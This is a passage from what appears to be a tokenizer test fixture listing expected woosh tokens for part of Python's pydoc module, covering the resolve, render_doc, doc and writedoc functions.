woosh.Token(woosh.NAME, 'return', 1724, 12, 1724, 18),
woosh.Token(woosh.NAME, 'None', 1724, 19, 1724, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1724, 23, 1725, 0),
woosh.Token(woosh.DEDENT, ' ', 1725, 0, 1725, 4),
woosh.Token(woosh.DEDENT, '', 1725, 4, 1725, 4),
woosh.Token(woosh.NAME, 'return', 1725, 4, 1725, 10),
woosh.Token(woosh.NAME, 'object', 1725, 11, 1725, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1725, 17, 1726, 0),
woosh.Token(woosh.COMMENT, '# --------------------------------------- interactive interpreter interface', 1727, 0, 1727, 75),
woosh.Token(woosh.DEDENT, '', 1729, 0, 1729, 0),
woosh.Token(woosh.NAME, 'text', 1729, 0, 1729, 4),
woosh.Token(woosh.OP, '=', 1729, 5, 1729, 6),
woosh.Token(woosh.NAME, 'TextDoc', 1729, 7, 1729, 14),
woosh.Token(woosh.OP, '(', 1729, 14, 1729, 15),
woosh.Token(woosh.OP, ')', 1729, 15, 1729, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1729, 16, 1730, 0),
woosh.Token(woosh.NAME, 'plaintext', 1730, 0, 1730, 9),
woosh.Token(woosh.OP, '=', 1730, 10, 1730, 11),
woosh.Token(woosh.NAME, '_PlainTextDoc', 1730, 12, 1730, 25),
woosh.Token(woosh.OP, '(', 1730, 25, 1730, 26),
woosh.Token(woosh.OP, ')', 1730, 26, 1730, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 1730, 27, 1731, 0),
woosh.Token(woosh.NAME, 'html', 1731, 0, 1731, 4),
woosh.Token(woosh.OP, '=', 1731, 5, 1731, 6),
woosh.Token(woosh.NAME, 'HTMLDoc', 1731, 7, 1731, 14),
woosh.Token(woosh.OP, '(', 1731, 14, 1731, 15),
woosh.Token(woosh.OP, ')', 1731, 15, 1731, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1731, 16, 1732, 0),
woosh.Token(woosh.NAME, 'def', 1733, 0, 1733, 3),
woosh.Token(woosh.NAME, 'resolve', 1733, 4, 1733, 11),
woosh.Token(woosh.OP, '(', 1733, 11, 1733, 12),
woosh.Token(woosh.NAME, 'thing', 1733, 12, 1733, 17),
woosh.Token(woosh.OP, ',', 1733, 17, 1733, 18),
woosh.Token(woosh.NAME, 'forceload', 1733, 19, 1733, 28),
woosh.Token(woosh.OP, '=', 1733, 28, 1733, 29),
woosh.Token(woosh.NUMBER, '0', 1733, 29, 1733, 30),
woosh.Token(woosh.OP, ')', 1733, 30, 1733, 31),
woosh.Token(woosh.OP, ':', 1733, 31, 1733, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 1733, 32, 1734, 0),
woosh.Token(woosh.INDENT, ' ', 1734, 0, 1734, 4),
woosh.Token(woosh.STRING, '"""Given an object or a path to an object, get the object and its name."""', 1734, 4, 1734, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 1734, 78, 1735, 0),
woosh.Token(woosh.NAME, 'if', 1735, 4, 1735, 6),
woosh.Token(woosh.NAME, 'isinstance', 1735, 7, 1735, 17),
woosh.Token(woosh.OP, '(', 1735, 17, 1735, 18),
woosh.Token(woosh.NAME, 'thing', 1735, 18, 1735, 23),
woosh.Token(woosh.OP, ',', 1735, 23, 1735, 24),
woosh.Token(woosh.NAME, 'str', 1735, 25, 1735, 28),
woosh.Token(woosh.OP, ')', 1735, 28, 1735, 29),
woosh.Token(woosh.OP, ':', 1735, 29, 1735, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 1735, 30, 1736, 0),
woosh.Token(woosh.INDENT, ' ', 1736, 0, 1736, 8),
woosh.Token(woosh.NAME, 'object', 1736, 8, 1736, 14),
woosh.Token(woosh.OP, '=', 1736, 15, 1736, 16),
woosh.Token(woosh.NAME, 'locate', 1736, 17, 1736, 23),
woosh.Token(woosh.OP, '(', 1736, 23, 1736, 24),
woosh.Token(woosh.NAME, 'thing', 1736, 24, 1736, 29),
woosh.Token(woosh.OP, ',', 1736, 29, 1736, 30),
woosh.Token(woosh.NAME, 'forceload', 1736, 31, 1736, 40),
woosh.Token(woosh.OP, ')', 1736, 40, 1736, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1736, 41, 1737, 0),
woosh.Token(woosh.NAME, 'if', 1737, 8, 1737, 10),
woosh.Token(woosh.NAME, 'object', 1737, 11, 1737, 17),
woosh.Token(woosh.NAME, 'is', 1737, 18, 1737, 20),
woosh.Token(woosh.NAME, 'None', 1737, 21, 1737, 25),
woosh.Token(woosh.OP, ':', 1737, 25, 1737, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 1737, 26, 1738, 0),
woosh.Token(woosh.INDENT, ' ', 1738, 0, 1738, 12),
woosh.Token(woosh.NAME, 'raise', 1738, 12, 1738, 17),
woosh.Token(woosh.NAME, 'ImportError', 1738, 18, 1738, 29),
woosh.Token(woosh.OP, '(', 1738, 29, 1738, 30),
woosh.Token(woosh.STRING, "'''\\\r\nNo Python documentation found for %r.\r\nUse help() to get the interactive help utility.\r\nUse help(str) for help on the str class.'''", 1738, 30, 1741, 43),
woosh.Token(woosh.OP, '%', 1741, 44, 1741, 45),
woosh.Token(woosh.NAME, 'thing', 1741, 46, 1741, 51),
woosh.Token(woosh.OP, ')', 1741, 51, 1741, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 1741, 52, 1742, 0),
woosh.Token(woosh.DEDENT, ' ', 1742, 0, 1742, 8),
woosh.Token(woosh.NAME, 'return', 1742, 8, 1742, 14),
woosh.Token(woosh.NAME, 'object', 1742, 15, 1742, 21),
woosh.Token(woosh.OP, ',', 1742, 21, 1742, 22),
woosh.Token(woosh.NAME, 'thing', 1742, 23, 1742, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1742, 28, 1743, 0),
woosh.Token(woosh.DEDENT, ' ', 1743, 0, 1743, 4),
woosh.Token(woosh.NAME, 'else', 1743, 4, 1743, 8),
woosh.Token(woosh.OP, ':', 1743, 8, 1743, 9),
woosh.Token(woosh.NEWLINE, '\r\n', 1743, 9, 1744, 0),
woosh.Token(woosh.INDENT, ' ', 1744, 0, 1744, 8),
woosh.Token(woosh.NAME, 'name', 1744, 8, 1744, 12),
woosh.Token(woosh.OP, '=', 1744, 13, 1744, 14),
woosh.Token(woosh.NAME, 'getattr', 1744, 15, 1744, 22),
woosh.Token(woosh.OP, '(', 1744, 22, 1744, 23),
woosh.Token(woosh.NAME, 'thing', 1744, 23, 1744, 28),
woosh.Token(woosh.OP, ',', 1744, 28, 1744, 29),
woosh.Token(woosh.STRING, "'__name__'", 1744, 30, 1744, 40),
woosh.Token(woosh.OP, ',', 1744, 40, 1744, 41),
woosh.Token(woosh.NAME, 'None', 1744, 42, 1744, 46),
woosh.Token(woosh.OP, ')', 1744, 46, 1744, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 1744, 47, 1745, 0),
woosh.Token(woosh.NAME, 'return', 1745, 8, 1745, 14),
woosh.Token(woosh.NAME, 'thing', 1745, 15, 1745, 20),
woosh.Token(woosh.OP, ',', 1745, 20, 1745, 21),
woosh.Token(woosh.NAME, 'name', 1745, 22, 1745, 26),
woosh.Token(woosh.NAME, 'if', 1745, 27, 1745, 29),
woosh.Token(woosh.NAME, 'isinstance', 1745, 30, 1745, 40),
woosh.Token(woosh.OP, '(', 1745, 40, 1745, 41),
woosh.Token(woosh.NAME, 'name', 1745, 41, 1745, 45),
woosh.Token(woosh.OP, ',', 1745, 45, 1745, 46),
woosh.Token(woosh.NAME, 'str', 1745, 47, 1745, 50),
woosh.Token(woosh.OP, ')', 1745, 50, 1745, 51),
woosh.Token(woosh.NAME, 'else', 1745, 52, 1745, 56),
woosh.Token(woosh.NAME, 'None', 1745, 57, 1745, 61),
woosh.Token(woosh.NEWLINE, '\r\n', 1745, 61, 1746, 0),
woosh.Token(woosh.DEDENT, '', 1747, 0, 1747, 0),
woosh.Token(woosh.DEDENT, '', 1747, 0, 1747, 0),
woosh.Token(woosh.NAME, 'def', 1747, 0, 1747, 3),
woosh.Token(woosh.NAME, 'render_doc', 1747, 4, 1747, 14),
woosh.Token(woosh.OP, '(', 1747, 14, 1747, 15),
woosh.Token(woosh.NAME, 'thing', 1747, 15, 1747, 20),
woosh.Token(woosh.OP, ',', 1747, 20, 1747, 21),
woosh.Token(woosh.NAME, 'title', 1747, 22, 1747, 27),
woosh.Token(woosh.OP, '=', 1747, 27, 1747, 28),
woosh.Token(woosh.STRING, "'Python Library Documentation: %s'", 1747, 28, 1747, 62),
woosh.Token(woosh.OP, ',', 1747, 62, 1747, 63),
woosh.Token(woosh.NAME, 'forceload', 1747, 64, 1747, 73),
woosh.Token(woosh.OP, '=', 1747, 73, 1747, 74),
woosh.Token(woosh.NUMBER, '0', 1747, 74, 1747, 75),
woosh.Token(woosh.OP, ',', 1747, 75, 1747, 76),
woosh.Token(woosh.NAME, 'renderer', 1748, 8, 1748, 16),
woosh.Token(woosh.OP, '=', 1748, 16, 1748, 17),
woosh.Token(woosh.NAME, 'None', 1748, 17, 1748, 21),
woosh.Token(woosh.OP, ')', 1748, 21, 1748, 22),
woosh.Token(woosh.OP, ':', 1748, 22, 1748, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1748, 23, 1749, 0),
woosh.Token(woosh.INDENT, ' ', 1749, 0, 1749, 4),
woosh.Token(woosh.STRING, '"""Render text documentation, given an object or a path to an object."""', 1749, 4, 1749, 76),
woosh.Token(woosh.NEWLINE, '\r\n', 1749, 76, 1750, 0),
woosh.Token(woosh.NAME, 'if', 1750, 4, 1750, 6),
woosh.Token(woosh.NAME, 'renderer', 1750, 7, 1750, 15),
woosh.Token(woosh.NAME, 'is', 1750, 16, 1750, 18),
woosh.Token(woosh.NAME, 'None', 1750, 19, 1750, 23),
woosh.Token(woosh.OP, ':', 1750, 23, 1750, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 1750, 24, 1751, 0),
woosh.Token(woosh.INDENT, ' ', 1751, 0, 1751, 8),
woosh.Token(woosh.NAME, 'renderer', 1751, 8, 1751, 16),
woosh.Token(woosh.OP, '=', 1751, 17, 1751, 18),
woosh.Token(woosh.NAME, 'text', 1751, 19, 1751, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 1751, 23, 1752, 0),
woosh.Token(woosh.DEDENT, ' ', 1752, 0, 1752, 4),
woosh.Token(woosh.NAME, 'object', 1752, 4, 1752, 10),
woosh.Token(woosh.OP, ',', 1752, 10, 1752, 11),
woosh.Token(woosh.NAME, 'name', 1752, 12, 1752, 16),
woosh.Token(woosh.OP, '=', 1752, 17, 1752, 18),
woosh.Token(woosh.NAME, 'resolve', 1752, 19, 1752, 26),
woosh.Token(woosh.OP, '(', 1752, 26, 1752, 27),
woosh.Token(woosh.NAME, 'thing', 1752, 27, 1752, 32),
woosh.Token(woosh.OP, ',', 1752, 32, 1752, 33),
woosh.Token(woosh.NAME, 'forceload', 1752, 34, 1752, 43),
woosh.Token(woosh.OP, ')', 1752, 43, 1752, 44),
woosh.Token(woosh.NEWLINE, '\r\n', 1752, 44, 1753, 0),
woosh.Token(woosh.NAME, 'desc', 1753, 4, 1753, 8),
woosh.Token(woosh.OP, '=', 1753, 9, 1753, 10),
woosh.Token(woosh.NAME, 'describe', 1753, 11, 1753, 19),
woosh.Token(woosh.OP, '(', 1753, 19, 1753, 20),
woosh.Token(woosh.NAME, 'object', 1753, 20, 1753, 26),
woosh.Token(woosh.OP, ')', 1753, 26, 1753, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 1753, 27, 1754, 0),
woosh.Token(woosh.NAME, 'module', 1754, 4, 1754, 10),
woosh.Token(woosh.OP, '=', 1754, 11, 1754, 12),
woosh.Token(woosh.NAME, 'inspect', 1754, 13, 1754, 20),
woosh.Token(woosh.OP, '.', 1754, 20, 1754, 21),
woosh.Token(woosh.NAME, 'getmodule', 1754, 21, 1754, 30),
woosh.Token(woosh.OP, '(', 1754, 30, 1754, 31),
woosh.Token(woosh.NAME, 'object', 1754, 31, 1754, 37),
woosh.Token(woosh.OP, ')', 1754, 37, 1754, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1754, 38, 1755, 0),
woosh.Token(woosh.NAME, 'if', 1755, 4, 1755, 6),
woosh.Token(woosh.NAME, 'name', 1755, 7, 1755, 11),
woosh.Token(woosh.NAME, 'and', 1755, 12, 1755, 15),
woosh.Token(woosh.STRING, "'.'", 1755, 16, 1755, 19),
woosh.Token(woosh.NAME, 'in', 1755, 20, 1755, 22),
woosh.Token(woosh.NAME, 'name', 1755, 23, 1755, 27),
woosh.Token(woosh.OP, ':', 1755, 27, 1755, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1755, 28, 1756, 0),
woosh.Token(woosh.INDENT, ' ', 1756, 0, 1756, 8),
woosh.Token(woosh.NAME, 'desc', 1756, 8, 1756, 12),
woosh.Token(woosh.OP, '+=', 1756, 13, 1756, 15),
woosh.Token(woosh.STRING, "' in '", 1756, 16, 1756, 22),
woosh.Token(woosh.OP, '+', 1756, 23, 1756, 24),
woosh.Token(woosh.NAME, 'name', 1756, 25, 1756, 29),
woosh.Token(woosh.OP, '[', 1756, 29, 1756, 30),
woosh.Token(woosh.OP, ':', 1756, 30, 1756, 31),
woosh.Token(woosh.NAME, 'name', 1756, 31, 1756, 35),
woosh.Token(woosh.OP, '.', 1756, 35, 1756, 36),
woosh.Token(woosh.NAME, 'rfind', 1756, 36, 1756, 41),
woosh.Token(woosh.OP, '(', 1756, 41, 1756, 42),
woosh.Token(woosh.STRING, "'.'", 1756, 42, 1756, 45),
woosh.Token(woosh.OP, ')', 1756, 45, 1756, 46),
woosh.Token(woosh.OP, ']', 1756, 46, 1756, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 1756, 47, 1757, 0),
woosh.Token(woosh.DEDENT, ' ', 1757, 0, 1757, 4),
woosh.Token(woosh.NAME, 'elif', 1757, 4, 1757, 8),
woosh.Token(woosh.NAME, 'module', 1757, 9, 1757, 15),
woosh.Token(woosh.NAME, 'and', 1757, 16, 1757, 19),
woosh.Token(woosh.NAME, 'module', 1757, 20, 1757, 26),
woosh.Token(woosh.NAME, 'is', 1757, 27, 1757, 29),
woosh.Token(woosh.NAME, 'not', 1757, 30, 1757, 33),
woosh.Token(woosh.NAME, 'object', 1757, 34, 1757, 40),
woosh.Token(woosh.OP, ':', 1757, 40, 1757, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1757, 41, 1758, 0),
woosh.Token(woosh.INDENT, ' ', 1758, 0, 1758, 8),
woosh.Token(woosh.NAME, 'desc', 1758, 8, 1758, 12),
woosh.Token(woosh.OP, '+=', 1758, 13, 1758, 15),
woosh.Token(woosh.STRING, "' in module '", 1758, 16, 1758, 29),
woosh.Token(woosh.OP, '+', 1758, 30, 1758, 31),
woosh.Token(woosh.NAME, 'module', 1758, 32, 1758, 38),
woosh.Token(woosh.OP, '.', 1758, 38, 1758, 39),
woosh.Token(woosh.NAME, '__name__', 1758, 39, 1758, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 1758, 47, 1759, 0),
woosh.Token(woosh.DEDENT, ' ', 1760, 0, 1760, 4),
woosh.Token(woosh.NAME, 'if', 1760, 4, 1760, 6),
woosh.Token(woosh.NAME, 'not', 1760, 7, 1760, 10),
woosh.Token(woosh.OP, '(', 1760, 11, 1760, 12),
woosh.Token(woosh.NAME, 'inspect', 1760, 12, 1760, 19),
woosh.Token(woosh.OP, '.', 1760, 19, 1760, 20),
woosh.Token(woosh.NAME, 'ismodule', 1760, 20, 1760, 28),
woosh.Token(woosh.OP, '(', 1760, 28, 1760, 29),
woosh.Token(woosh.NAME, 'object', 1760, 29, 1760, 35),
woosh.Token(woosh.OP, ')', 1760, 35, 1760, 36),
woosh.Token(woosh.NAME, 'or', 1760, 37, 1760, 39),
woosh.Token(woosh.NAME, 'inspect', 1761, 14, 1761, 21),
woosh.Token(woosh.OP, '.', 1761, 21, 1761, 22),
woosh.Token(woosh.NAME, 'isclass', 1761, 22, 1761, 29),
woosh.Token(woosh.OP, '(', 1761, 29, 1761, 30),
woosh.Token(woosh.NAME, 'object', 1761, 30, 1761, 36),
woosh.Token(woosh.OP, ')', 1761, 36, 1761, 37),
woosh.Token(woosh.NAME, 'or', 1761, 38, 1761, 40),
woosh.Token(woosh.NAME, 'inspect', 1762, 14, 1762, 21),
woosh.Token(woosh.OP, '.', 1762, 21, 1762, 22),
woosh.Token(woosh.NAME, 'isroutine', 1762, 22, 1762, 31),
woosh.Token(woosh.OP, '(', 1762, 31, 1762, 32),
woosh.Token(woosh.NAME, 'object', 1762, 32, 1762, 38),
woosh.Token(woosh.OP, ')', 1762, 38, 1762, 39),
woosh.Token(woosh.NAME, 'or', 1762, 40, 1762, 42),
woosh.Token(woosh.NAME, 'inspect', 1763, 14, 1763, 21),
woosh.Token(woosh.OP, '.', 1763, 21, 1763, 22),
woosh.Token(woosh.NAME, 'isdatadescriptor', 1763, 22, 1763, 38),
woosh.Token(woosh.OP, '(', 1763, 38, 1763, 39),
woosh.Token(woosh.NAME, 'object', 1763, 39, 1763, 45),
woosh.Token(woosh.OP, ')', 1763, 45, 1763, 46),
woosh.Token(woosh.NAME, 'or', 1763, 47, 1763, 49),
woosh.Token(woosh.NAME, '_getdoc', 1764, 14, 1764, 21),
woosh.Token(woosh.OP, '(', 1764, 21, 1764, 22),
woosh.Token(woosh.NAME, 'object', 1764, 22, 1764, 28),
woosh.Token(woosh.OP, ')', 1764, 28, 1764, 29),
woosh.Token(woosh.OP, ')', 1764, 29, 1764, 30),
woosh.Token(woosh.OP, ':', 1764, 30, 1764, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1764, 31, 1765, 0),
woosh.Token(woosh.COMMENT, '# If the passed object is a piece of data or an instance,', 1765, 8, 1765, 65),
woosh.Token(woosh.COMMENT, '# document its available methods instead of its value.', 1766, 8, 1766, 62),
woosh.Token(woosh.INDENT, ' ', 1767, 0, 1767, 8),
woosh.Token(woosh.NAME, 'if', 1767, 8, 1767, 10),
woosh.Token(woosh.NAME, 'hasattr', 1767, 11, 1767, 18),
woosh.Token(woosh.OP, '(', 1767, 18, 1767, 19),
woosh.Token(woosh.NAME, 'object', 1767, 19, 1767, 25),
woosh.Token(woosh.OP, ',', 1767, 25, 1767, 26),
woosh.Token(woosh.STRING, "'__origin__'", 1767, 27, 1767, 39),
woosh.Token(woosh.OP, ')', 1767, 39, 1767, 40),
woosh.Token(woosh.OP, ':', 1767, 40, 1767, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 1767, 41, 1768, 0),
woosh.Token(woosh.INDENT, ' ', 1768, 0, 1768, 12),
woosh.Token(woosh.NAME, 'object', 1768, 12, 1768, 18),
woosh.Token(woosh.OP, '=', 1768, 19, 1768, 20),
woosh.Token(woosh.NAME, 'object', 1768, 21, 1768, 27),
woosh.Token(woosh.OP, '.', 1768, 27, 1768, 28),
woosh.Token(woosh.NAME, '__origin__', 1768, 28, 1768, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 1768, 38, 1769, 0),
woosh.Token(woosh.DEDENT, ' ', 1769, 0, 1769, 8),
woosh.Token(woosh.NAME, 'else', 1769, 8, 1769, 12),
woosh.Token(woosh.OP, ':', 1769, 12, 1769, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1769, 13, 1770, 0),
woosh.Token(woosh.INDENT, ' ', 1770, 0, 1770, 12),
woosh.Token(woosh.NAME, 'object', 1770, 12, 1770, 18),
woosh.Token(woosh.OP, '=', 1770, 19, 1770, 20),
woosh.Token(woosh.NAME, 'type', 1770, 21, 1770, 25),
woosh.Token(woosh.OP, '(', 1770, 25, 1770, 26),
woosh.Token(woosh.NAME, 'object', 1770, 26, 1770, 32),
woosh.Token(woosh.OP, ')', 1770, 32, 1770, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 1770, 33, 1771, 0),
woosh.Token(woosh.NAME, 'desc', 1771, 12, 1771, 16),
woosh.Token(woosh.OP, '+=', 1771, 17, 1771, 19),
woosh.Token(woosh.STRING, "' object'", 1771, 20, 1771, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 1771, 29, 1772, 0),
woosh.Token(woosh.DEDENT, ' ', 1772, 0, 1772, 4),
woosh.Token(woosh.DEDENT, '', 1772, 4, 1772, 4),
woosh.Token(woosh.NAME, 'return', 1772, 4, 1772, 10),
woosh.Token(woosh.NAME, 'title', 1772, 11, 1772, 16),
woosh.Token(woosh.OP, '%', 1772, 17, 1772, 18),
woosh.Token(woosh.NAME, 'desc', 1772, 19, 1772, 23),
woosh.Token(woosh.OP, '+', 1772, 24, 1772, 25),
woosh.Token(woosh.STRING, "'\\n\\n'", 1772, 26, 1772, 32),
woosh.Token(woosh.OP, '+', 1772, 33, 1772, 34),
woosh.Token(woosh.NAME, 'renderer', 1772, 35, 1772, 43),
woosh.Token(woosh.OP, '.', 1772, 43, 1772, 44),
woosh.Token(woosh.NAME, 'document', 1772, 44, 1772, 52),
woosh.Token(woosh.OP, '(', 1772, 52, 1772, 53),
woosh.Token(woosh.NAME, 'object', 1772, 53, 1772, 59),
woosh.Token(woosh.OP, ',', 1772, 59, 1772, 60),
woosh.Token(woosh.NAME, 'name', 1772, 61, 1772, 65),
woosh.Token(woosh.OP, ')', 1772, 65, 1772, 66),
woosh.Token(woosh.NEWLINE, '\r\n', 1772, 66, 1773, 0),
woosh.Token(woosh.DEDENT, '', 1774, 0, 1774, 0),
woosh.Token(woosh.NAME, 'def', 1774, 0, 1774, 3),
woosh.Token(woosh.NAME, 'doc', 1774, 4, 1774, 7),
woosh.Token(woosh.OP, '(', 1774, 7, 1774, 8),
woosh.Token(woosh.NAME, 'thing', 1774, 8, 1774, 13),
woosh.Token(woosh.OP, ',', 1774, 13, 1774, 14),
woosh.Token(woosh.NAME, 'title', 1774, 15, 1774, 20),
woosh.Token(woosh.OP, '=', 1774, 20, 1774, 21),
woosh.Token(woosh.STRING, "'Python Library Documentation: %s'", 1774, 21, 1774, 55),
woosh.Token(woosh.OP, ',', 1774, 55, 1774, 56),
woosh.Token(woosh.NAME, 'forceload', 1774, 57, 1774, 66),
woosh.Token(woosh.OP, '=', 1774, 66, 1774, 67),
woosh.Token(woosh.NUMBER, '0', 1774, 67, 1774, 68),
woosh.Token(woosh.OP, ',', 1774, 68, 1774, 69),
woosh.Token(woosh.NAME, 'output', 1775, 8, 1775, 14),
woosh.Token(woosh.OP, '=', 1775, 14, 1775, 15),
woosh.Token(woosh.NAME, 'None', 1775, 15, 1775, 19),
woosh.Token(woosh.OP, ')', 1775, 19, 1775, 20),
woosh.Token(woosh.OP, ':', 1775, 20, 1775, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1775, 21, 1776, 0),
woosh.Token(woosh.INDENT, ' ', 1776, 0, 1776, 4),
woosh.Token(woosh.STRING, '"""Display text documentation, given an object or a path to an object."""', 1776, 4, 1776, 77),
woosh.Token(woosh.NEWLINE, '\r\n', 1776, 77, 1777, 0),
woosh.Token(woosh.NAME, 'try', 1777, 4, 1777, 7),
woosh.Token(woosh.OP, ':', 1777, 7, 1777, 8),
woosh.Token(woosh.NEWLINE, '\r\n', 1777, 8, 1778, 0),
woosh.Token(woosh.INDENT, ' ', 1778, 0, 1778, 8),
woosh.Token(woosh.NAME, 'if', 1778, 8, 1778, 10),
woosh.Token(woosh.NAME, 'output', 1778, 11, 1778, 17),
woosh.Token(woosh.NAME, 'is', 1778, 18, 1778, 20),
woosh.Token(woosh.NAME, 'None', 1778, 21, 1778, 25),
woosh.Token(woosh.OP, ':', 1778, 25, 1778, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 1778, 26, 1779, 0),
woosh.Token(woosh.INDENT, ' ', 1779, 0, 1779, 12),
woosh.Token(woosh.NAME, 'pager', 1779, 12, 1779, 17),
woosh.Token(woosh.OP, '(', 1779, 17, 1779, 18),
woosh.Token(woosh.NAME, 'render_doc', 1779, 18, 1779, 28),
woosh.Token(woosh.OP, '(', 1779, 28, 1779, 29),
woosh.Token(woosh.NAME, 'thing', 1779, 29, 1779, 34),
woosh.Token(woosh.OP, ',', 1779, 34, 1779, 35),
woosh.Token(woosh.NAME, 'title', 1779, 36, 1779, 41),
woosh.Token(woosh.OP, ',', 1779, 41, 1779, 42),
woosh.Token(woosh.NAME, 'forceload', 1779, 43, 1779, 52),
woosh.Token(woosh.OP, ')', 1779, 52, 1779, 53),
woosh.Token(woosh.OP, ')', 1779, 53, 1779, 54),
woosh.Token(woosh.NEWLINE, '\r\n', 1779, 54, 1780, 0),
woosh.Token(woosh.DEDENT, ' ', 1780, 0, 1780, 8),
woosh.Token(woosh.NAME, 'else', 1780, 8, 1780, 12),
woosh.Token(woosh.OP, ':', 1780, 12, 1780, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 1780, 13, 1781, 0),
woosh.Token(woosh.INDENT, ' ', 1781, 0, 1781, 12),
woosh.Token(woosh.NAME, 'output', 1781, 12, 1781, 18),
woosh.Token(woosh.OP, '.', 1781, 18, 1781, 19),
woosh.Token(woosh.NAME, 'write', 1781, 19, 1781, 24),
woosh.Token(woosh.OP, '(', 1781, 24, 1781, 25),
woosh.Token(woosh.NAME, 'render_doc', 1781, 25, 1781, 35),
woosh.Token(woosh.OP, '(', 1781, 35, 1781, 36),
woosh.Token(woosh.NAME, 'thing', 1781, 36, 1781, 41),
woosh.Token(woosh.OP, ',', 1781, 41, 1781, 42),
woosh.Token(woosh.NAME, 'title', 1781, 43, 1781, 48),
woosh.Token(woosh.OP, ',', 1781, 48, 1781, 49),
woosh.Token(woosh.NAME, 'forceload', 1781, 50, 1781, 59),
woosh.Token(woosh.OP, ',', 1781, 59, 1781, 60),
woosh.Token(woosh.NAME, 'plaintext', 1781, 61, 1781, 70),
woosh.Token(woosh.OP, ')', 1781, 70, 1781, 71),
woosh.Token(woosh.OP, ')', 1781, 71, 1781, 72),
woosh.Token(woosh.NEWLINE, '\r\n', 1781, 72, 1782, 0),
woosh.Token(woosh.DEDENT, ' ', 1782, 0, 1782, 4),
woosh.Token(woosh.DEDENT, '', 1782, 4, 1782, 4),
woosh.Token(woosh.NAME, 'except', 1782, 4, 1782, 10),
woosh.Token(woosh.OP, '(', 1782, 11, 1782, 12),
woosh.Token(woosh.NAME, 'ImportError', 1782, 12, 1782, 23),
woosh.Token(woosh.OP, ',', 1782, 23, 1782, 24),
woosh.Token(woosh.NAME, 'ErrorDuringImport', 1782, 25, 1782, 42),
woosh.Token(woosh.OP, ')', 1782, 42, 1782, 43),
woosh.Token(woosh.NAME, 'as', 1782, 44, 1782, 46),
woosh.Token(woosh.NAME, 'value', 1782, 47, 1782, 52),
woosh.Token(woosh.OP, ':', 1782, 52, 1782, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 1782, 53, 1783, 0),
woosh.Token(woosh.INDENT, ' ', 1783, 0, 1783, 8),
woosh.Token(woosh.NAME, 'print', 1783, 8, 1783, 13),
woosh.Token(woosh.OP, '(', 1783, 13, 1783, 14),
woosh.Token(woosh.NAME, 'value', 1783, 14, 1783, 19),
woosh.Token(woosh.OP, ')', 1783, 19, 1783, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1783, 20, 1784, 0),
woosh.Token(woosh.DEDENT, '', 1785, 0, 1785, 0),
woosh.Token(woosh.DEDENT, '', 1785, 0, 1785, 0),
woosh.Token(woosh.NAME, 'def', 1785, 0, 1785, 3),
woosh.Token(woosh.NAME, 'writedoc', 1785, 4, 1785, 12),
woosh.Token(woosh.OP, '(', 1785, 12, 1785, 13),
woosh.Token(woosh.NAME, 'thing', 1785, 13, 1785, 18),
woosh.Token(woosh.OP, ',', 1785, 18, 1785, 19),
woosh.Token(woosh.NAME, 'forceload', 1785, 20, 1785, 29),
woosh.Token(woosh.OP, '=', 1785, 29, 1785, 30),
woosh.Token(woosh.NUMBER, '0', 1785, 30, 1785, 31),
woosh.Token(woosh.OP, ')', 1785, 31, 1785, 32),
woosh.Token(woosh.OP, ':', 1785, 32, 1785, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 1785, 33, 1786, 0),
woosh.Token(woosh.INDENT, ' ', 1786, 0, 1786, 4),
woosh.Token(woosh.STRING, '"""Write HTML documentation to a file in the current directory."""', 1786, 4, 1786, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 1786, 70, 1787, 0),
woosh.Token(woosh.NAME, 'try', 1787, 4, 1787, 7),
woosh.Token(woosh.OP, ':', 1787, 7, 1787, 8),
woosh.Token(woosh.NEWLINE, '\r\n', 1787, 8, 1788, 0),
woosh.Token(woosh.INDENT, ' ', 1788, 0, 1788, 8),
woosh.Token(woosh.NAME, 'object', 1788, 8, 1788, 14),
woosh.Token(woosh.OP, ',', 1788, 14, 1788, 15),
woosh.Token(woosh.NAME, 'name', 1788, 16, 1788, 20),
woosh.Token(woosh.OP, '=', 1788, 21, 1788, 22),
woosh.Token(woosh.NAME, 'resolve', 1788, 23, 1788, 30),
woosh.Token(woosh.OP, '(', 1788, 30, 1788, 31),
woosh.Token(woosh.NAME, 'thing', 1788, 31, 1788, 36),
woosh.Token(woosh.OP, ',', 1788, 36, 1788, 37),
woosh.Token(woosh.NAME, 'forceload', 1788, 38, 1788, 47),
woosh.Token(woosh.OP, ')', 1788, 47, 1788, 48),
woosh.Token(woosh.NEWLINE, '\r\n', 1788, 48, 1789, 0),
woosh.Token(woosh.NAME, 'page', 1789, 8, 1789, 12),
woosh.Token(woosh.OP, '=', 1789, 13, 1789, 14),
woosh.Token(woosh.NAME, 'html', 1789, 15, 1789, 19),
woosh.Token(woosh.OP, '.', 1789, 19, 1789, 20),
woosh.Token(woosh.NAME, 'page', 1789, 20, 1789, 24),
